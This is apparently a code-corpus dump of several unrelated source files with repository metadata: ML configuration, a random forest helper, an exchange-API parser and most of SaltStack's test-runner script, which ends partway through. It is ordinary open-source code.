#-----------------------------------------------------------------------------
from ..layouts import Panel, Tabs; Panel, Tabs
| 42.111111
| 78
| 0.430079
|
3bc099ce47b7d45f221636fb4d8f41d2d640b48c
| 3,192
|
py
|
Python
|
model_zoo/official/nlp/cpm/src/config.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | 1
|
2021-07-03T06:52:20.000Z
|
2021-07-03T06:52:20.000Z
|
model_zoo/official/nlp/cpm/src/config.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | null | null | null |
model_zoo/official/nlp/cpm/src/config.py
|
Vincent34/mindspore
|
a39a60878a46e7e9cb02db788c0bca478f2fa6e5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Configure"""
from easydict import EasyDict as ed
config_zero_shot_standalone = ed({
"dp": 1,
"mp": 1,
"batch_size": 1,
"rank_size": 1,
"vocab_size": 30000,
'seq_length': 571,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
config_zero_shot_distrubute = ed({
"dp": 1,
"mp": 2,
"batch_size": 2,
"rank_size": 2,
"vocab_size": 30000,
'seq_length': 571,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
finetune_dev_standalone = ed({
"dp": 1,
"mp": 1,
"batch_size": 1,
"rank_size": 1,
"vocab_size": 30000,
'seq_length': 696,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
finetune_dev_distrubute = ed({
"dp": 1,
"mp": 2,
"batch_size": 1,
"rank_size": 2,
"vocab_size": 30000,
'seq_length': 696,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
finetune_test_standalone = ed({
"dp": 1,
"mp": 1,
"batch_size": 1,
"rank_size": 1,
"vocab_size": 30000,
'seq_length': 666,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
finetune_test_distrubute = ed({
"dp": 1,
"mp": 2,
"batch_size": 1,
"rank_size": 2,
"vocab_size": 30000,
'seq_length': 666,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32
})
config_train_single_machine = ed({
"dp": 4,
"mp": 2,
"epoch": 10,
"batch_size": 16,
"rank_size": 8,
"vocab_size": 30000,
'seq_length': 725,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32,
"lr": 1e-5,
"eps": 1e-8,
"dropout": 0.2,
"end_learning_rate": 1e-7,
"weight_decay": 1e-2,
"warmup_steps": 0.05,
"power": 1.0,
"grad_accumulation_step": 4,
"sink_size": 1
})
config_train_multi_machine = ed({
"dp": 16,
"mp": 2,
"epoch": 10,
"batch_size": 128,
"rank_size": 32,
"vocab_size": 30000,
'seq_length': 725,
"hidden_size": 2560,
"num_hidden_layers": 32,
"num_attention_heads": 32,
"lr": 2e-5,
"eps": 1e-8,
"dropout": 0.1,
"end_learning_rate": 1e-7,
"weight_decay": 1e-2,
"warmup_steps": 0.1,
"power": 1.0,
"grad_accumulation_step": 1,
"sink_size": 1
})
| 24
| 79
| 0.572055
|
34052b82e1eb2b65ed6e360048332319e5ef6be7
| 1,080
|
py
|
Python
|
public/public/TypDe/training/models/random_forest_classifier.py
|
jsperezsalazar2001/TypDe_GUI
|
4b6e2d3de14d79888d0baf91c57bb5a874e3e28e
|
[
"MIT"
] | null | null | null |
public/public/TypDe/training/models/random_forest_classifier.py
|
jsperezsalazar2001/TypDe_GUI
|
4b6e2d3de14d79888d0baf91c57bb5a874e3e28e
|
[
"MIT"
] | null | null | null |
public/public/TypDe/training/models/random_forest_classifier.py
|
jsperezsalazar2001/TypDe_GUI
|
4b6e2d3de14d79888d0baf91c57bb5a874e3e28e
|
[
"MIT"
] | null | null | null |
from sklearn.ensemble import RandomForestClassifier
from sklearn.base import clone
import numpy as np
import matplotlib.pyplot as plt
def createModel(n_estimators, random_state):
random_forest = RandomForestClassifier(n_estimators=n_estimators, random_state=random_state)
return random_forest
def fit(model, x_train, y_train):
model = clone(model).fit(x_train, y_train)
variables = model.feature_importances_
return model, variables
def predict(model, x_test):
result = model.predict(x_test)
return result
def showImportantColumns(columns, variables):
columns_len = len(columns)
indices = np.argsort(variables)[::-1]
for f in range(columns_len):
print("%2d) %-*s %f" % (f + 1, 30, columns[indices[f]], variables[indices[f]]), indices[f])
plt.title('Feature Importance')
plt.bar(range(columns_len), variables[indices], align='center')
plt.xticks(range(columns_len), columns[indices], rotation=90)
plt.xlim([-1, columns_len])
plt.tight_layout()
# plt.savefig('images/04_09.png', dpi=300)
plt.show()
| 31.764706
| 99
| 0.72037
|
fb1d5eb496a43a294b7114972bb0dfa5256e5bdf
| 122
|
py
|
Python
|
leo/test/external_files/at-auto-section-ref-test.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 1,550
|
2015-01-14T16:30:37.000Z
|
2022-03-31T08:55:58.000Z
|
leo/test/external_files/at-auto-section-ref-test.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 2,009
|
2015-01-13T16:28:52.000Z
|
2022-03-31T18:21:48.000Z
|
leo/test/external_files/at-auto-section-ref-test.py
|
thomasbuttler/leo-editor
|
c1bddc31313b7788f0d6583dcb4ab75db73e9a09
|
[
"MIT"
] | 200
|
2015-01-05T15:07:41.000Z
|
2022-03-07T17:05:01.000Z
|
# ~/at-auto-test.py
# This is valid Python, but it looks like a section reference.
c = b = d = 0
a = b << c >> d
# end.
| 15.25
| 62
| 0.581967
|
46cc2346cbf3f766ef5f5f18c8184f3dd9a562f2
| 917
|
py
|
Python
|
huobi/model/mbpevent.py
|
xiaohuid/huobi_Python
|
ebc84b2fc560f77fd77457f36ff91906c43646e3
|
[
"Apache-2.0"
] | 1
|
2020-12-28T07:04:45.000Z
|
2020-12-28T07:04:45.000Z
|
huobi/model/mbpevent.py
|
xiaohuid/huobi_Python
|
ebc84b2fc560f77fd77457f36ff91906c43646e3
|
[
"Apache-2.0"
] | null | null | null |
huobi/model/mbpevent.py
|
xiaohuid/huobi_Python
|
ebc84b2fc560f77fd77457f36ff91906c43646e3
|
[
"Apache-2.0"
] | 1
|
2022-03-27T10:36:04.000Z
|
2022-03-27T10:36:04.000Z
|
from huobi.constant.result import OutputKey
from huobi.impl.utils.channelparser import ChannelParser
from huobi.model import *
class MbpEvent:
"""
increasement of price depth.
:member
symbol: The symbol you subscribed.
timestamp: The UNIX formatted timestamp generated by server in UTC.
data: The price depth.
"""
def __init__(self):
self.symbol = ""
self.ch = ""
self.ts = 0
self.data = Mbp()
@staticmethod
def json_parse(json_wrapper):
ch = json_wrapper.get_string(OutputKey.KeyChannelCh)
parse = ChannelParser(ch)
mbp_event = MbpEvent()
mbp_event.symbol = parse.symbol
mbp_event.ts = json_wrapper.get_int("ts")
mbp_event.ch = ch
data = json_wrapper.get_object(OutputKey.KeyTick)
mbp = Mbp.json_parse(data)
mbp_event.data = mbp
return mbp_event
| 26.2
| 75
| 0.636859
|
8f2d1bf6e2ef3e083385bead5bda6904b9fb5364
| 39,392
|
py
|
Python
|
tests/runtests.py
|
johnj/salt
|
b23656fa5ee24047c43ac702d6796a700570f749
|
[
"Apache-2.0"
] | 5
|
2017-02-07T05:39:29.000Z
|
2020-06-13T02:07:33.000Z
|
tests/runtests.py
|
johnj/salt
|
b23656fa5ee24047c43ac702d6796a700570f749
|
[
"Apache-2.0"
] | 86
|
2017-01-27T11:54:46.000Z
|
2020-05-20T06:25:26.000Z
|
tests/runtests.py
|
johnj/salt
|
b23656fa5ee24047c43ac702d6796a700570f749
|
[
"Apache-2.0"
] | 11
|
2017-01-26T19:36:29.000Z
|
2021-12-11T07:54:16.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Discover all instances of unittest.TestCase in this directory.
'''
# pylint: disable=file-perms
# Import python libs
from __future__ import absolute_import, print_function
import os
import sys
import time
import warnings
import collections
TESTS_DIR = os.path.dirname(os.path.normpath(os.path.abspath(__file__)))
if os.name == 'nt':
TESTS_DIR = TESTS_DIR.replace('\\', '\\\\')
CODE_DIR = os.path.dirname(TESTS_DIR)
# Let's inject CODE_DIR so salt is importable if not there already
if '' in sys.path:
sys.path.remove('')
if TESTS_DIR in sys.path:
sys.path.remove(TESTS_DIR)
if CODE_DIR in sys.path and sys.path[0] != CODE_DIR:
sys.path.remove(CODE_DIR)
if CODE_DIR not in sys.path:
sys.path.insert(0, CODE_DIR)
if TESTS_DIR not in sys.path:
sys.path.insert(1, TESTS_DIR)
try:
import tests
if not tests.__file__.startswith(CODE_DIR):
print('Found tests module not from salt in {}'.format(tests.__file__))
sys.modules.pop('tests')
module_dir = os.path.dirname(tests.__file__)
if module_dir in sys.path:
sys.path.remove(module_dir)
del tests
except ImportError:
pass
# Import salt libs
try:
from tests.support.paths import TMP, SYS_TMP_DIR, INTEGRATION_TEST_DIR
from tests.support.paths import CODE_DIR as SALT_ROOT
except ImportError as exc:
try:
import tests
print('Found tests module not from salt in {}'.format(tests.__file__))
except ImportError:
print('Unable to import salt test module')
print('PYTHONPATH:', os.environ.get('PYTHONPATH'))
print('Current sys.path:')
import pprint
pprint.pprint(sys.path)
raise exc
from tests.integration import TestDaemon, TestDaemonStartFailed # pylint: disable=W0403
from tests.multimaster import MultimasterTestDaemon
import salt.utils.platform
if not salt.utils.platform.is_windows():
import resource
# Import Salt Testing libs
from tests.support.parser import PNUM, print_header
from tests.support.parser.cover import SaltCoverageTestingParser
XML_OUTPUT_DIR = os.environ.get(
'SALT_XML_TEST_REPORTS_DIR',
os.path.join(TMP, 'xml-test-reports')
)
HTML_OUTPUT_DIR = os.environ.get(
'SALT_HTML_TEST_REPORTS_DIR',
os.path.join(TMP, 'html-test-reports')
)
TEST_DIR = os.path.dirname(INTEGRATION_TEST_DIR)
try:
if SALT_ROOT:
os.chdir(SALT_ROOT)
except OSError as err:
print('Failed to change directory to salt\'s source: {0}'.format(err))
# Soft and hard limits on max open filehandles
MAX_OPEN_FILES = {
'integration': {
'soft_limit': 3072,
'hard_limit': 4096,
},
'unit': {
'soft_limit': 1024,
'hard_limit': 2048,
},
}
# Combine info from command line options and test suite directories. A test
# suite is a python package of test modules relative to the tests directory.
TEST_SUITES_UNORDERED = {
'unit':
{'display_name': 'Unit',
'path': 'unit'},
'kitchen':
{'display_name': 'Kitchen',
'path': 'kitchen'},
'multimaster':
{'display_name': 'Multimaster',
'path': 'multimaster'},
'module':
{'display_name': 'Module',
'path': 'integration/modules'},
'state':
{'display_name': 'State',
'path': 'integration/states'},
'cli':
{'display_name': 'CLI',
'path': 'integration/cli'},
'client':
{'display_name': 'Client',
'path': 'integration/client'},
'doc':
{'display_name': 'Documentation',
'path': 'integration/doc'},
'ext_pillar':
{'display_name': 'External Pillar',
'path': 'integration/pillar'},
'grains':
{'display_name': 'Grains',
'path': 'integration/grains'},
'shell':
{'display_name': 'Shell',
'path': 'integration/shell'},
'runners':
{'display_name': 'Runners',
'path': 'integration/runners'},
'renderers':
{'display_name': 'Renderers',
'path': 'integration/renderers'},
'returners':
{'display_name': 'Returners',
'path': 'integration/returners'},
'ssh-int':
{'display_name': 'SSH Integration',
'path': 'integration/ssh'},
'spm':
{'display_name': 'SPM',
'path': 'integration/spm'},
'loader':
{'display_name': 'Loader',
'path': 'integration/loader'},
'outputter':
{'display_name': 'Outputter',
'path': 'integration/output'},
'fileserver':
{'display_name': 'Fileserver',
'path': 'integration/fileserver'},
'wheel':
{'display_name': 'Wheel',
'path': 'integration/wheel'},
'api':
{'display_name': 'NetAPI',
'path': 'integration/netapi'},
'cloud_provider':
{'display_name': 'Cloud Provider',
'path': 'integration/cloud/clouds'},
'minion':
{'display_name': 'Minion',
'path': 'integration/minion'},
'reactor':
{'display_name': 'Reactor',
'path': 'integration/reactor'},
'proxy':
{'display_name': 'Proxy',
'path': 'integration/proxy'},
'external_api':
{'display_name': 'ExternalAPIs',
'path': 'integration/externalapi'},
'daemons':
{'display_name': 'Daemon',
'path': 'integration/daemons'},
'scheduler':
{'display_name': 'Scheduler',
'path': 'integration/scheduler'},
'sdb':
{'display_name': 'Sdb',
'path': 'integration/sdb'},
'logging':
{'display_name': 'Logging',
'path': 'integration/logging'},
}
TEST_SUITES = collections.OrderedDict(sorted(TEST_SUITES_UNORDERED.items(),
key=lambda x: x[0]))
class SaltTestsuiteParser(SaltCoverageTestingParser):
support_docker_execution = True
support_destructive_tests_selection = True
source_code_basedir = SALT_ROOT
def _get_suites(self, include_unit=False, include_cloud_provider=False,
include_proxy=False, include_kitchen=False, include_multimaster=False):
'''
Return a set of all test suites except unit and cloud provider tests
unless requested
'''
suites = set(TEST_SUITES.keys())
if not include_unit:
suites -= set(['unit'])
if not include_cloud_provider:
suites -= set(['cloud_provider'])
if not include_proxy:
suites -= set(['proxy'])
if not include_kitchen:
suites -= set(['kitchen'])
if not include_multimaster:
suites -= set(['multimaster'])
return suites
def _check_enabled_suites(self, include_unit=False,
include_cloud_provider=False,
include_proxy=False,
include_kitchen=False,
include_multimaster=False):
'''
Query whether test suites have been enabled
'''
suites = self._get_suites(include_unit=include_unit,
include_cloud_provider=include_cloud_provider,
include_proxy=include_proxy,
include_kitchen=include_kitchen,
include_multimaster=include_multimaster)
return any([getattr(self.options, suite) for suite in suites])
def _enable_suites(self, include_unit=False, include_cloud_provider=False,
include_proxy=False, include_kitchen=False, include_multimaster=False):
'''
Enable test suites for current test run
'''
suites = self._get_suites(include_unit=include_unit,
include_cloud_provider=include_cloud_provider,
include_proxy=include_proxy,
include_kitchen=include_kitchen,
include_multimaster=include_multimaster)
for suite in suites:
setattr(self.options, suite, True)
def setup_additional_options(self):
self.add_option(
'--sysinfo',
default=False,
action='store_true',
help='Print some system information.'
)
self.add_option(
'--transport',
default='zeromq',
choices=('zeromq', 'tcp'),
help=('Select which transport to run the integration tests with, '
'zeromq or tcp. Default: %default')
)
self.add_option(
'--interactive',
default=False,
action='store_true',
help='Do not run any tests. Simply start the daemons.'
)
self.output_options_group.add_option(
'--no-colors',
'--no-colours',
default=False,
action='store_true',
help='Disable colour printing.'
)
self.test_selection_group.add_option(
'-m',
'--module',
'--module-tests',
dest='module',
default=False,
action='store_true',
help='Run tests for modules'
)
self.test_selection_group.add_option(
'-S',
'--state',
'--state-tests',
dest='state',
default=False,
action='store_true',
help='Run tests for states'
)
self.test_selection_group.add_option(
'-C',
'--cli',
'--cli-tests',
dest='cli',
default=False,
action='store_true',
help='Run tests for cli'
)
self.test_selection_group.add_option(
'-c',
'--client',
'--client-tests',
dest='client',
default=False,
action='store_true',
help='Run tests for client'
)
self.test_selection_group.add_option(
'-d',
'--doc',
'--doc-tests',
dest='doc',
default=False,
action='store_true',
help='Run tests for documentation'
)
self.test_selection_group.add_option(
'-I',
'--ext-pillar',
'--ext-pillar-tests',
dest='ext_pillar',
default=False,
action='store_true',
help='Run ext_pillar tests'
)
self.test_selection_group.add_option(
'-G',
'--grains',
'--grains-tests',
dest='grains',
default=False,
action='store_true',
help='Run tests for grains'
)
self.test_selection_group.add_option(
'-s',
'--shell',
'--shell-tests',
dest='shell',
default=False,
action='store_true',
help='Run shell tests'
)
self.test_selection_group.add_option(
'-r',
'--runners',
'--runner-tests',
dest='runners',
default=False,
action='store_true',
help='Run salt/runners/*.py tests'
)
self.test_selection_group.add_option(
'-R',
'--renderers',
'--renderer-tests',
dest='renderers',
default=False,
action='store_true',
help='Run salt/renderers/*.py tests'
)
self.test_selection_group.add_option(
'--reactor',
dest='reactor',
default=False,
action='store_true',
help='Run salt/reactor/*.py tests'
)
self.test_selection_group.add_option(
'--minion',
'--minion-tests',
dest='minion',
default=False,
action='store_true',
help='Run tests for minion'
)
self.test_selection_group.add_option(
'--returners',
dest='returners',
default=False,
action='store_true',
help='Run salt/returners/*.py tests'
)
self.test_selection_group.add_option(
'--spm',
dest='spm',
default=False,
action='store_true',
help='Run spm integration tests'
)
self.test_selection_group.add_option(
'-l',
'--loader',
'--loader-tests',
dest='loader',
default=False,
action='store_true',
help='Run loader tests'
)
self.test_selection_group.add_option(
'-u',
'--unit',
'--unit-tests',
dest='unit',
default=False,
action='store_true',
help='Run unit tests'
)
self.test_selection_group.add_option(
'-k',
'--kitchen',
'--kitchen-tests',
dest='kitchen',
default=False,
action='store_true',
help='Run kitchen tests'
)
self.test_selection_group.add_option(
'--fileserver',
'--fileserver-tests',
dest='fileserver',
default=False,
action='store_true',
help='Run Fileserver tests'
)
self.test_selection_group.add_option(
'-w',
'--wheel',
'--wheel-tests',
dest='wheel',
action='store_true',
default=False,
help='Run wheel tests'
)
self.test_selection_group.add_option(
'-o',
'--outputter',
'--outputter-tests',
dest='outputter',
action='store_true',
default=False,
help='Run outputter tests'
)
self.test_selection_group.add_option(
'--cloud-provider',
'--cloud-provider-tests',
dest='cloud_provider',
action='store_true',
default=False,
help=('Run cloud provider tests. These tests create and delete '
'instances on cloud providers. Must provide valid credentials '
'in salt/tests/integration/files/conf/cloud.*.d to run tests.')
)
self.test_selection_group.add_option(
'--ssh',
'--ssh-tests',
dest='ssh',
action='store_true',
default=False,
help='Run salt-ssh tests. These tests will spin up a temporary '
'SSH server on your machine. In certain environments, this '
'may be insecure! Default: False'
)
self.test_selection_group.add_option(
'--ssh-int',
dest='ssh-int',
action='store_true',
default=False,
help='Run salt-ssh integration tests. Requires to be run with --ssh'
'to spin up the SSH server on your machine.'
)
self.test_selection_group.add_option(
'-A',
'--api',
'--api-tests',
dest='api',
action='store_true',
default=False,
help='Run salt-api tests'
)
self.test_selection_group.add_option(
'--sdb',
'--sdb-tests',
dest='sdb',
action='store_true',
default=False,
help='Run sdb tests'
)
self.test_selection_group.add_option(
'-P',
'--proxy',
'--proxy-tests',
dest='proxy',
action='store_true',
default=False,
help='Run salt-proxy tests'
)
self.test_selection_group.add_option(
'--external',
'--external-api',
'--external-api-tests',
dest='external_api',
action='store_true',
default=False,
help='Run venafi runner tests'
)
self.test_selection_group.add_option(
'--daemons',
'--daemon-tests',
dest='daemons',
action='store_true',
default=False,
help='Run salt/daemons/*.py tests'
)
self.test_selection_group.add_option(
'--scheduler',
dest='scheduler',
action='store_true',
default=False,
help='Run scheduler integration tests'
)
self.test_selection_group.add_option(
'--logging',
dest='logging',
action='store_true',
default=False,
help='Run logging integration tests'
)
self.test_selection_group.add_option(
'--multimaster',
dest='multimaster',
action='store_true',
default=False,
help='Start multimaster daemons and run multimaster integration tests'
)
def validate_options(self):
if self.options.cloud_provider or self.options.external_api:
# Turn on expensive tests execution
os.environ['EXPENSIVE_TESTS'] = 'True'
# This fails even with salt.utils.platform imported in the global
# scope, unless we import it again here.
import salt.utils.platform
if salt.utils.platform.is_windows():
import salt.utils.win_functions
current_user = salt.utils.win_functions.get_current_user()
if current_user == 'SYSTEM':
is_admin = True
else:
is_admin = salt.utils.win_functions.is_admin(current_user)
if self.options.coverage and any((
self.options.name,
not is_admin,
not self.options.run_destructive)) \
and self._check_enabled_suites(include_unit=True):
warnings.warn("Test suite not running with elevated priviledges")
else:
is_admin = os.geteuid() == 0
if self.options.coverage and any((
self.options.name,
not is_admin,
not self.options.run_destructive)) \
and self._check_enabled_suites(include_unit=True):
self.error(
'No sense in generating the tests coverage report when '
'not running the full test suite, including the '
'destructive tests, as \'root\'. It would only produce '
'incorrect results.'
)
# When no tests are specifically enumerated on the command line, setup
# a default run: +unit -cloud_provider
if not self.options.name and not \
self._check_enabled_suites(include_unit=True,
include_cloud_provider=True,
include_proxy=True,
include_kitchen=True,
include_multimaster=True):
self._enable_suites(include_unit=True, include_multimaster=True)
self.start_coverage(
branch=True,
source=[os.path.join(SALT_ROOT, 'salt')],
)
# Print out which version of python this test suite is running on
print(' * Python Version: {0}'.format(' '.join(sys.version.split())))
# Transplant configuration
TestDaemon.transplant_configs(transport=self.options.transport)
MultimasterTestDaemon.transplant_configs(transport=self.options.transport)
def post_execution_cleanup(self):
SaltCoverageTestingParser.post_execution_cleanup(self)
if self.options.clean:
TestDaemon.clean()
def run_integration_suite(self, path='', display_name=''):
'''
Run an integration test suite
'''
full_path = os.path.join(TEST_DIR, path)
return self.run_suite(
full_path, display_name, suffix='test_*.py',
failfast=self.options.failfast,
)
def start_daemons_only(self):
if not salt.utils.platform.is_windows():
self.set_filehandle_limits('integration')
try:
print_header(
' * Setting up Salt daemons for interactive use',
top=False, width=getattr(self.options, 'output_columns', PNUM)
)
except TypeError:
print_header(' * Setting up Salt daemons for interactive use', top=False)
try:
with TestDaemon(self):
print_header(' * Salt daemons started')
master_conf = TestDaemon.config('master')
minion_conf = TestDaemon.config('minion')
proxy_conf = TestDaemon.config('proxy')
sub_minion_conf = TestDaemon.config('sub_minion')
syndic_conf = TestDaemon.config('syndic')
syndic_master_conf = TestDaemon.config('syndic_master')
print_header(' * Syndic master configuration values (MoM)', top=False)
print('interface: {0}'.format(syndic_master_conf['interface']))
print('publish port: {0}'.format(syndic_master_conf['publish_port']))
print('return port: {0}'.format(syndic_master_conf['ret_port']))
print('\n')
print_header(' * Syndic configuration values', top=True)
print('interface: {0}'.format(syndic_conf['interface']))
print('syndic master: {0}'.format(syndic_conf['syndic_master']))
print('syndic master port: {0}'.format(syndic_conf['syndic_master_port']))
print('\n')
print_header(' * Master configuration values', top=True)
print('interface: {0}'.format(master_conf['interface']))
print('publish port: {0}'.format(master_conf['publish_port']))
print('return port: {0}'.format(master_conf['ret_port']))
print('\n')
print_header(' * Minion configuration values', top=True)
print('interface: {0}'.format(minion_conf['interface']))
print('master: {0}'.format(minion_conf['master']))
print('master port: {0}'.format(minion_conf['master_port']))
if minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(minion_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(minion_conf['tcp_pull_port']))
print('\n')
print_header(' * Sub Minion configuration values', top=True)
print('interface: {0}'.format(sub_minion_conf['interface']))
print('master: {0}'.format(sub_minion_conf['master']))
print('master port: {0}'.format(sub_minion_conf['master_port']))
if sub_minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(sub_minion_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(sub_minion_conf['tcp_pull_port']))
print('\n')
print_header(' * Proxy Minion configuration values', top=True)
print('interface: {0}'.format(proxy_conf['interface']))
print('master: {0}'.format(proxy_conf['master']))
print('master port: {0}'.format(proxy_conf['master_port']))
if minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(proxy_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(proxy_conf['tcp_pull_port']))
print('\n')
print_header(' Your client configuration is at {0}'.format(TestDaemon.config_location()))
print('To access the minion: salt -c {0} minion test.ping'.format(TestDaemon.config_location()))
while True:
time.sleep(1)
except TestDaemonStartFailed:
self.exit(status=2)
def start_multimaster_daemons_only(self):
if not salt.utils.platform.is_windows():
self.set_filehandle_limits('integration')
try:
print_header(
' * Setting up Salt daemons for interactive use',
top=False, width=getattr(self.options, 'output_columns', PNUM)
)
except TypeError:
print_header(' * Setting up Salt daemons for interactive use', top=False)
try:
with MultimasterTestDaemon(self):
print_header(' * Salt daemons started')
master_conf = MultimasterTestDaemon.config('mm_master')
sub_master_conf = MultimasterTestDaemon.config('mm_sub_master')
minion_conf = MultimasterTestDaemon.config('mm_minion')
sub_minion_conf = MultimasterTestDaemon.config('mm_sub_minion')
print_header(' * Master configuration values', top=True)
print('interface: {0}'.format(master_conf['interface']))
print('publish port: {0}'.format(master_conf['publish_port']))
print('return port: {0}'.format(master_conf['ret_port']))
print('\n')
print_header(' * Second master configuration values', top=True)
print('interface: {0}'.format(sub_master_conf['interface']))
print('publish port: {0}'.format(sub_master_conf['publish_port']))
print('return port: {0}'.format(sub_master_conf['ret_port']))
print('\n')
print_header(' * Minion configuration values', top=True)
print('interface: {0}'.format(minion_conf['interface']))
print('masters: {0}'.format(', '.join(minion_conf['master'])))
if minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(minion_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(minion_conf['tcp_pull_port']))
print('\n')
print_header(' * Sub Minion configuration values', top=True)
print('interface: {0}'.format(sub_minion_conf['interface']))
print('masters: {0}'.format(', '.join(sub_minion_conf['master'])))
if sub_minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(sub_minion_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(sub_minion_conf['tcp_pull_port']))
print('\n')
print_header(' Your client configurations are at {0}'.format(
', '.join(MultimasterTestDaemon.config_location())))
print('To access minions from different masters use:')
for location in MultimasterTestDaemon.config_location():
print(' salt -c {0} minion test.ping'.format(location))
while True:
time.sleep(1)
except TestDaemonStartFailed:
self.exit(status=2)
def set_filehandle_limits(self, limits='integration'):
'''
Set soft and hard limits on open file handles at required thresholds
for integration tests or unit tests
'''
# Get current limits
if salt.utils.platform.is_windows():
import win32file
prev_hard = win32file._getmaxstdio()
prev_soft = 512
else:
prev_soft, prev_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
# Get required limits
min_soft = MAX_OPEN_FILES[limits]['soft_limit']
min_hard = MAX_OPEN_FILES[limits]['hard_limit']
# Check minimum required limits
set_limits = False
if prev_soft < min_soft:
soft = min_soft
set_limits = True
else:
soft = prev_soft
if prev_hard < min_hard:
hard = min_hard
set_limits = True
else:
hard = prev_hard
# Increase limits
if set_limits:
print(
' * Max open files settings is too low (soft: {0}, hard: {1}) '
'for running the tests'.format(prev_soft, prev_hard)
)
print(
' * Trying to raise the limits to soft: '
'{0}, hard: {1}'.format(soft, hard)
)
try:
if salt.utils.platform.is_windows():
hard = 2048 if hard > 2048 else hard
win32file._setmaxstdio(hard)
else:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except Exception as err:
print(
'ERROR: Failed to raise the max open files settings -> '
'{0}'.format(err)
)
print('Please issue the following command on your console:')
print(' ulimit -n {0}'.format(soft))
self.exit()
finally:
print('~' * getattr(self.options, 'output_columns', PNUM))
def run_integration_tests(self):
'''
Execute the integration tests suite
'''
named_tests = []
named_unit_test = []
if self.options.name:
for test in self.options.name:
if test.startswith(('tests.unit.', 'unit.',
'test.kitchen.', 'kitchen.',
'test.multimaster.', 'multimaster.')):
named_unit_test.append(test)
continue
named_tests.append(test)
if (self.options.unit or self.options.kitchen or self.options.multimaster or named_unit_test) \
and not named_tests \
and (self.options.from_filenames or
not self._check_enabled_suites(include_cloud_provider=True)):
# We're either not running any integration test suites, or we're
# only running unit tests by passing --unit or by passing only
# `unit.<whatever>` to --name. We don't need the tests daemon
# running
return [True]
if not salt.utils.platform.is_windows():
self.set_filehandle_limits('integration')
try:
print_header(
' * Setting up Salt daemons to execute tests',
top=False, width=getattr(self.options, 'output_columns', PNUM)
)
except TypeError:
print_header(' * Setting up Salt daemons to execute tests', top=False)
status = []
# Return an empty status if no tests have been enabled
if not self._check_enabled_suites(include_cloud_provider=True, include_proxy=True) and not self.options.name:
return status
try:
with TestDaemon(self):
if self.options.name:
for name in self.options.name:
name = name.strip()
if not name:
continue
if os.path.isfile(name):
if not name.endswith('.py'):
continue
if name.startswith((os.path.join('tests', 'unit'),
os.path.join('tests', 'multimaster'))):
continue
results = self.run_suite(os.path.dirname(name),
name,
suffix=os.path.basename(name),
failfast=self.options.failfast,
load_from_name=False)
status.append(results)
continue
if name.startswith(('tests.unit.', 'unit.',
'tests.multimaster.', 'multimaster.')):
continue
results = self.run_suite(
'', name, suffix='test_*.py', load_from_name=True,
failfast=self.options.failfast,
)
status.append(results)
return status
for suite in TEST_SUITES:
if suite != 'unit' and suite != 'multimaster' and getattr(self.options, suite):
status.append(self.run_integration_suite(**TEST_SUITES[suite]))
return status
except TestDaemonStartFailed:
self.exit(status=2)
def run_multimaster_tests(self):
'''
Execute the multimaster tests suite
'''
named_tests = []
named_unit_test = []
if self.options.name:
for test in self.options.name:
if test.startswith(('tests.multimaster.', 'multimaster.')):
named_tests.append(test)
# TODO: check 'from_filenames'
if not self.options.multimaster and not named_tests:
# We're not running any multimaster test suites.
return [True]
if not salt.utils.platform.is_windows():
self.set_filehandle_limits('integration')
try:
print_header(
' * Setting up multimaster Salt daemons to execute tests',
top=False, width=getattr(self.options, 'output_columns', PNUM)
)
except TypeError:
print_header(' * Setting up multimaster Salt daemons to execute tests', top=False)
status = []
try:
with MultimasterTestDaemon(self):
if self.options.name:
for name in self.options.name:
name = name.strip()
if not name:
continue
if os.path.isfile(name):
if not name.endswith('.py'):
continue
if not name.startswith(os.path.join('tests', 'multimaster')):
continue
results = self.run_suite(os.path.dirname(name),
name,
suffix=os.path.basename(name),
load_from_name=False)
status.append(results)
continue
if not name.startswith(('tests.multimaster.', 'multimaster.')):
continue
results = self.run_suite('', name, suffix='test_*.py', load_from_name=True)
status.append(results)
return status
status.append(self.run_integration_suite(**TEST_SUITES['multimaster']))
return status
except TestDaemonStartFailed:
self.exit(status=2)
def run_unit_tests(self):
'''
Execute the unit tests
'''
named_unit_test = []
if self.options.name:
for test in self.options.name:
if not test.startswith(('tests.unit.', 'unit.')):
continue
named_unit_test.append(test)
if not named_unit_test \
and (self.options.from_filenames or not self.options.unit):
